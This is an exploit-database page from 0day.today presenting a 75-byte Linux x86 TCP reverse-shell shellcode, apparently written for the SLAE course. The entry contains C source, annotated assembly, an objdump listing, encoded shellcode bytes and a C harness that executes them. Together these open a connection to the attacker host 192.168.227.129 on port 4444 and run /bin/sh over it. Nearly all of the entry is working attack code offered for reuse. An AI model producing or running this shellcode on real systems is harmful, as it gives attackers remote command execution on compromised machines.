0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - TCP Reverse Shellcode (75 bytes)
/* # Linux x86 TCP Reverse Shellcode (75 bytes) # Author: sajith # Tested on: i686 GNU/Linux # Shellcode Length: 75 # SLAE - 750 ------------c prog ---poc by sajith shetty---------- #include <sys/types.h> #include <sys/socket.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sock_file_des; struct sockaddr_in sock_ad; //[1] create socket connection //Man page: socket(int domain, int type, int protocol); sock_file_des = socket(AF_INET, SOCK_STREAM, 0); //[2]connect back to attacker machine (ip= 192.168.227.129) //Man page: int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen); sock_ad.sin_family = AF_INET; sock_ad.sin_port = htons(4444); sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129"); connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad)); //[3]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2 //Man page: int dup2(int oldfd, int newfd); dup2(sock_file_des, 0); // stdin dup2(sock_file_des, 1); // stdout dup2(sock_file_des, 2); // stderr //[4]Execute shell (here we use /bin/sh) using execve call //[*]Man page for execve call //int execve(const char *filename, char *const argv[],char *const envp[]); execve("/bin/sh", 0, 0); } ----------------------end of c program-------------- global _start section .text _start: ;[1] create socket connection ;Man page: socket(int domain, int type, int protocol); ;sock_file_des = socket(2,1,0) xor edx, edx push 0x66 ; socket call(0x66) pop eax push edx ; protocol = 0 inc edx push edx ; sock_stream = 1 mov ebx, edx ; EBX =1 inc edx push edx ; AF_INET =2 mov ecx, esp ; save the pointer to args in ecx register int 0x80 ; call socketcall() ; int dup2(int oldfd, int newfd); mov ebx, eax ; store sock_file_des in ebx register mov ecx, edx ; counter = 2 loop: mov al, 0x3f int 0x80 dec ecx jns loop ; sock_ad.sin_family = AF_INET; ;sock_ad.sin_port = htons(4444); ;sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129"); ;connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad)); xchg ebx, edx ; before xchg edx=2 and ebx=sock_file_des and after xchg ebx=2, edx=sock_file_des push 0x81e3a8c0 ; sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129"); push word 0x5C11 ; sock_ad.sin_port = htons(4444); push word bx ; sock_ad.sin_family = AF_INET =2; mov ecx, esp ; pointer to struct mov al, 0x66 ; socket call (0x66) inc ebx ; connect (3) push 0x10 ; sizeof(struct sockaddr_in) push ecx ; &serv_addr push edx ; sock_file_des mov ecx, esp ; save the pointer to args in ecx register int 0x80 mov al, 11 ; execve system call cdq ; overwriting edx with either 0 (if eax is positive) push edx ; push null push 0x68732f6e ; hs/b push 0x69622f2f ; ib// mov ebx,esp ; save pointer push edx ; push null push ebx ; push pointer mov ecx,esp ; save pointer int 0x80 -------------obj dump------------ rev_shell1: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: 31 d2 xor edx,edx 8048062: 6a 66 push 0x66 8048064: 58 pop eax 8048065: 52 push edx 8048066: 42 inc edx 8048067: 52 push edx 8048068: 89 d3 mov ebx,edx 804806a: 42 inc edx 804806b: 52 push edx 804806c: 89 e1 mov ecx,esp 804806e: cd 80 int 0x80 8048070: 89 c3 mov ebx,eax 8048072: 89 d1 mov ecx,edx 08048074 <loop>: 8048074: b0 3f mov al,0x3f 8048076: cd 80 int 0x80 8048078: 49 dec ecx 8048079: 79 f9 jns 8048074 <loop> 804807b: 87 da xchg edx,ebx 804807d: 68 c0 a8 e3 81 push 0x81e3a8c0 8048082: 66 68 11 5c pushw 0x5c11 8048086: 66 53 push bx 8048088: 89 e1 mov ecx,esp 804808a: b0 66 mov al,0x66 804808c: 43 inc ebx 804808d: 6a 10 push 0x10 804808f: 51 push ecx 8048090: 52 push edx 8048091: 89 e1 mov ecx,esp 8048093: cd 80 int 0x80 8048095: b0 0b mov al,0xb 8048097: 99 cdq 8048098: 52 push edx 8048099: 68 6e 2f 73 68 push 0x68732f6e 804809e: 68 2f 2f 62 69 push 0x69622f2f 80480a3: 89 e3 mov ebx,esp 80480a5: 52 push edx 80480a6: 53 push ebx 80480a7: 89 e1 mov ecx,esp 80480a9: cd 80 int 0x80 ----------------------------------------------- gcc -fno-stack-protector -z execstack shellcode.c -o shellcode */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\x31\xd2\x6a\x66\x58\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68" "\xc0\xa8\xe3\x81" //IP address 192.168.227.129 "\x66\x68" "\x11\x5c" // port 4444 "\x66\x53\x89\xe1\xb0\x66\x43\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } # 0day.today [2024-09-29] #